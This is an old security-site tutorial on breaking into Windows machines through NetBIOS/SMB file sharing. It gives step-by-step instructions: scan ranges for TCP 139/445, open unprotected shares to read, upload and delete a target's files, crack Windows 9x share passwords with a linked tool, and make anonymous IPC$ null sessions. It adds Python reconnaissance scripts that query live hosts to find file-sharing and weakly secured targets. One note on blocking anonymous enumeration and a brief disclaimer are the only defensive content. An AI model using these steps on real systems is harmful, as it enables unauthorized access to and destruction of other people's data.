Welcome To Security.Fx-Vista.Com

Computer Security Information


NetBIOS Vulnerability


By Rishabh Đara 

 

::What is NetBIOS?:: NetBIOS (Network Basic Input/Output System) is an Application Programming Interface (API) originally designed by IBM and Sytek so that client software could access LAN resources. It became a de facto industry standard and gives network applications a common way to find each other by name, set up sessions and exchange data, which is to say it lets applications talk to the network. On TCP/IP networks it runs as NetBIOS over TCP/IP (NBT, RFC 1001/1002) and uses three ports: UDP 137 for the name service, UDP 138 for the datagram service and TCP 139 for the session service.

 

::NetBIOS in Windows:: A Windows machine is reachable over NetBIOS if TCP port 139 (the NetBIOS session service) is open. In the period this tutorial describes, all "File and Printer Sharing" on Windows ran over this port, a significant fraction of home machines on the Internet exposed their hard disks through it, and it was therefore both the first port an attacker connected to and one of the first ports firewalls block. Port 139 also carries the SMB browser traffic that populates the "Network Neighbourhood" icon. Note that Windows 2000 and later also speak SMB directly over TCP port 445 without the NetBIOS layer, so a scan for port 139 alone misses many hosts.

 

::Finding the vulnerable:: Scan the target network or IP range for hosts with TCP port 139 open (and, for Windows 2000 or later, TCP 445). The tool this tutorial uses is LANguard Network Scanner (linked below), but any port scanner that can sweep a range will do. Hosts that answer on these ports are the candidates for the next step.
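A port scan only tells you that 139 is open; the NetBIOS name service on UDP 137 tells you what is behind it. A node status (NBSTAT) query returns the host's name table, and a unique name carrying the suffix <20> means the File Server Service is running, which is exactly what LANguard and `nbtstat -A` look at. The following is an added example written for this page in Python, not code from the original tutorial or from LANguard: it builds the wildcard node-status query, parses the reply, and flags hosts that are sharing files. The reply bytes, the names WORKSTATION1 and WORKGROUP, and the MAC address are constructed for offline testing; `node_status()` sends the real query to a host you supply.

```python
import socket
import struct

NBSTAT = 0x0021  # NetBIOS node status query type (RFC 1002, section 4.2.17)

# Common 16th-byte suffixes in a Windows NetBIOS name table
SUFFIX_NAMES = {
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x20: "File Server Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers (group)",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections (group)",
}


def encode_netbios_name(name: str, suffix: int = 0x00, pad: bytes = b" ") -> bytes:
    """First-level encoding (RFC 1001, section 14.1): pad the name to 15 bytes, append the
    suffix byte, then write each nibble as a letter 'A'..'P'. The result is a single
    32-character label with an empty scope (NUL terminator)."""
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append(0x41 + (b >> 4))
        encoded.append(0x41 + (b & 0x0F))
    return bytes([32]) + bytes(encoded) + b"\x00"


def build_node_status_request(txid: int = 0x1234) -> bytes:
    """Header (ID, flags 0 = unicast query, 1 question) plus the '*' wildcard name.
    The wildcard is padded with NUL bytes, not spaces, hence the familiar 'CKAAAA...'."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = encode_netbios_name("*", suffix=0x00, pad=b"\x00") + struct.pack(">HH", NBSTAT, 1)
    return header + question


def parse_node_status_response(data: bytes) -> dict:
    """Decode the name table and the unit ID (MAC) from a NODE STATUS RESPONSE."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a positive node status response")
    off = 12
    while data[off]:               # skip the answer name (length-prefixed labels)
        off += 1 + data[off]
    off += 1                       # NUL terminator of the name
    rr_type, _rr_class, _ttl, _rdlength = struct.unpack_from(">HHIH", data, off)
    off += 10
    if rr_type != NBSTAT:
        raise ValueError(f"unexpected RR type 0x{rr_type:04x}")
    num_names = data[off]
    off += 1
    names = []
    for _ in range(num_names):     # 18 bytes each: 15-byte name, suffix, 2-byte flags
        raw, suffix = data[off:off + 15], data[off + 15]
        nflags = struct.unpack_from(">H", data, off + 16)[0]
        off += 18
        names.append({
            "name": raw.rstrip(b" \x00").decode("ascii", "replace"),
            "suffix": suffix,
            "service": SUFFIX_NAMES.get(suffix, "unknown"),
            "group": bool(nflags & 0x8000),   # G bit: group name (domain/workgroup)
            "active": bool(nflags & 0x0400),  # ACT bit
        })
    mac = ":".join(f"{b:02x}" for b in data[off:off + 6])  # statistics start with the unit ID
    file_sharing = any(n["suffix"] == 0x20 and not n["group"] for n in names)
    return {"txid": txid, "names": names, "mac": mac, "file_sharing": file_sharing}


def node_status(host: str, timeout: float = 2.0) -> dict:
    """Query a live host on UDP 137 (this is what `nbtstat -A host` does)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(), (host, 137))
        data, _ = s.recvfrom(2048)
    return parse_node_status_response(data)


def constructed_response() -> bytes:
    """A reply constructed by hand for offline testing (not a real capture): one host named
    WORKSTATION1 running the Workstation and File Server services in workgroup WORKGROUP."""
    def entry(name: str, suffix: int, flags: int) -> bytes:
        return name.encode().ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", flags)
    entries = (entry("WORKSTATION1", 0x00, 0x0400)
               + entry("WORKSTATION1", 0x20, 0x0400)
               + entry("WORKGROUP", 0x00, 0x8400))
    stats = bytes.fromhex("000c29aabbcc") + bytes(40)      # unit ID then zeroed counters
    rdata = bytes([3]) + entries + stats
    header = struct.pack(">HHHHHH", 0x1234, 0x8400, 0, 1, 0, 0)
    answer = encode_netbios_name("*", pad=b"\x00") + struct.pack(">HHIH", NBSTAT, 1, 0, len(rdata))
    return header + answer + rdata


if __name__ == "__main__":
    print(parse_node_status_response(constructed_response()))
```

The query is sent unicast to the host itself, so it works across routers and does not depend on the target announcing itself; the same packet, broadcast to 255.255.255.255, is how Windows lists a whole segment.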

 

::Exploiting the vulnerability:: Start » Run » \\xxx.xxx.xxx.xxx » OK, where xxx.xxx.xxx.xxx is the IP address of the target. If the machine exports unprotected shares, Explorer opens a window listing them, and a share that covers a whole drive exposes the contents of the target's hard disk. You can then view, download, upload and delete files on the target exactly as with a local folder. Only folders or drives the owner has actually shared are reachable this way.

 

::Getting past the password box:: If a password prompt appears instead, the share is protected by a share-level password (Windows 95/98/ME). PQwak (linked below) recovers such passwords: it asks for the IP address and the share name (the name of the password-protected folder) and does the rest. It works because of the Windows 9x "Share Level Password" flaw (Microsoft bulletin MS00-072), in which the server compared only as many password bytes as the client sent, so the password can be guessed one character at a time. PQwak does not work against the IPC$ share, because IPC$ uses user-level (account) authentication rather than a per-share password.

 

::Getting around the IPC$ share:: This section explains how attackers "use" IPC. Inter-Process Communication is used for data sharing between applications and between computers; here we look at the default IPC$ share that Windows NT uses for communication between computers. Connecting to it with an empty user name and an empty password (a "null session") is the starting point for gaining access to the server, because by default NT lets such an anonymous session enumerate shares, users and policy. The tools are the NET commands in the NT console (a Win32 command prompt, not real MS-DOS), specifically NET USE and NET VIEW. (Note: I was unable to create a null connection using a 95/98 computer; I had to use an NT computer.) Pick your target, make sure it is an NT system with port 139 open, then open the console and type one of the following:

 

Example 1> C:\>NET USE \\TARGET\IPC$ * /USER:

Example 2> C:\>NET USE \\TARGET\IPC$ * /USER:""

Example 3> C:\>NET USE \\TARGET\IPC$ "" /USER:""

 

a. Note: The exact syntax varies slightly between NT versions, which is why three forms are given; try them in turn.

b. Note: TARGET is the NetBIOS name or IP address of the computer, e.g. NET USE \\211.3.4.11\IPC$ * /USER:

c. Note: If it works you'll get: The command completed successfully.

d. Note: To check the connection, type NET USE with no arguments to list your active connections, then NET VIEW \\TARGET to list the target's shares over the null session.

e. Note: An administrator can block this enumeration with the RestrictAnonymous value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (1 on NT 4 SP3 and later, 2 on Windows 2000); Windows XP and 2003 tighten the defaults further with RestrictAnonymousSAM and EveryoneIncludesAnonymous.
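The NET USE commands above only make sense against a server that uses user-level (account based) security; a Windows 9x box with share-level passwords is the PQwak case instead. Both facts are announced in the first SMB message of every connection, the NEGOTIATE reply, before any authentication happens, along with whether the server requires SMB signing. The following is an added example written for this page in Python, not code from the original tutorial: it builds the SMB1 NEGOTIATE request, sends it over TCP 445 (which needs no NetBIOS session setup; on port 139 a session request naming the target must precede it), and decodes the selected dialect and the SecurityMode bits. The reply bytes, the WORKGROUP domain name and the challenge are constructed for offline testing.

```python
import socket
import struct

SMB_COM_NEGOTIATE = 0x72
# Dialects an SMB1 client offers, oldest first; the server replies with an index into this list
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
            b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12"]
# SecurityMode bits in the NT LM 0.12 negotiate reply
USER_SECURITY, ENCRYPT_PASSWORDS, SIGNING_ENABLED, SIGNING_REQUIRED = 0x01, 0x02, 0x04, 0x08


def smb_header(command: int, flags: int = 0x18, flags2: int = 0xC001) -> bytes:
    """32-byte SMB1 header: magic, command, NT status, flags, flags2, PID high,
    signature, reserved, TID, PID, UID, MID."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, 0, flags, flags2,
                       0, bytes(8), 0, 0, 0xFEFF, 0, 1)


def build_negotiate_request() -> bytes:
    """NetBIOS session message (type 0x00 + 24-bit length) carrying SMB_COM_NEGOTIATE
    with WordCount 0 and the dialect list as 0x02-prefixed NUL-terminated strings."""
    dialects = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    smb = smb_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(dialects)) + dialects
    return struct.pack(">I", len(smb)) + smb


def parse_negotiate_response(data: bytes) -> dict:
    """Pull the dialect and SecurityMode out of a NEGOTIATE reply."""
    if len(data) < 4 or data[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    smb = data[4:4 + int.from_bytes(data[1:4], "big")]
    if len(smb) < 35 or smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_NEGOTIATE or not smb[9] & 0x80:
        raise ValueError("not an SMB1 NEGOTIATE reply")
    status = struct.unpack_from("<I", smb, 5)[0]
    if status:
        raise ValueError(f"server returned NT status 0x{status:08x}")
    word_count = smb[32]
    if word_count == 1:                        # core-protocol reply: dialect index only
        idx = struct.unpack_from("<H", smb, 33)[0]
        return {"dialect": DIALECTS[idx].decode(), "security_mode": None}
    if word_count != 17:                       # NT LM 0.12 reply has 17 words
        raise ValueError(f"unexpected WordCount {word_count}")
    idx, mode = struct.unpack_from("<HB", smb, 33)
    if idx == 0xFFFF:
        raise ValueError("server accepted none of the offered dialects")
    return {
        "dialect": DIALECTS[idx].decode(),
        "security_mode": mode,
        "user_level_security": bool(mode & USER_SECURITY),   # clear = share-level (Win9x style)
        "encrypted_passwords": bool(mode & ENCRYPT_PASSWORDS),
        "signing_enabled": bool(mode & SIGNING_ENABLED),
        "signing_required": bool(mode & SIGNING_REQUIRED),
    }


def negotiate(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Run the exchange against a live host (port is an assumption; 139 needs a session request first)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        data = s.recv(4096)
    return parse_negotiate_response(data)


def constructed_nt_response(mode: int = USER_SECURITY | ENCRYPT_PASSWORDS) -> bytes:
    """Reply constructed by hand (not a capture) in the shape an NT 4 server sends:
    NT LM 0.12 selected, the given SecurityMode, 8-byte challenge, domain WORKGROUP."""
    words = struct.pack("<HBHHIIIIQhB", 5, mode, 50, 1, 16644, 65536, 0, 0x0000E3FD, 0, 0, 8)
    body = bytes(range(8)) + "WORKGROUP".encode("utf-16-le") + b"\x00\x00"
    smb = (smb_header(SMB_COM_NEGOTIATE, flags=0x98) + bytes([17]) + words
           + struct.pack("<H", len(body)) + body)
    return struct.pack(">I", len(smb)) + smb


if __name__ == "__main__":
    print(parse_negotiate_response(constructed_nt_response()))
```

A reply with `user_level_security` false points you back to the share-password section; one with it true and `signing_required` false is the classic NT target the NET USE examples were written for.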

 

::Disclaimer:: This tutorial is for educational purposes only and should not be exploited for personal benefit.

 

Hyperlinks:

 

ftp://ftp.languard.com/lannetscan.exe

http://darknet.hack.gr/exploits/os/win/me/pqwak2.zip 


 

Copyright ©2008 www.Security.Fx-Vista.Com | All rights reserved